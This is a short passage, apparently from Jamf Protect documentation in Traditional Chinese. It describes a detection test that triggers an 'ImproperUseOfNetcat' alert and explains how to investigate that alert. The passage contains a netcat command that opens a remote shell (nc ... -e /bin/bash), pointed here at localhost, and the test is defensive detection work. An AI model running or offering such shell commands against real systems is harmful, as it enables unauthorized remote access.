Requirements
如果使用虛擬機器,請拍攝快照以在此模擬結束時還原。
- 開啟終端機並執行以下命令。
# try to initiate a remote session with netcat nc 127.0.0.1 8080 -e /bin/bash完成上述測試步驟後,Jamf Protect Cloud內部預計會出現標題為ImproperUseOfNetcat的新警示。 - 開啟並檢視ImproperUseOfNetcat警示。分析此警示時最有趣的資料點是:
Summary(摘要)> Process Event Details(程序事件詳細資訊)> Process Arguments(程序引數):這將提供遠端連線的目標IP位址和連接埠,以及嘗試執行的程式。
- 程序:程序樹將提供Netcat遠端工作階段如何啟動的指示。
在現實場景中,對此警示的調查應首先檢查程序引數,以識別遠端工作階段的目標和嘗試執行的程式,以及識別Netcat命令是如何透過程序樹執行。
- 如果在完成此測試場景之前拍攝了虛擬機快照,最簡單的清理方法是還原到快照。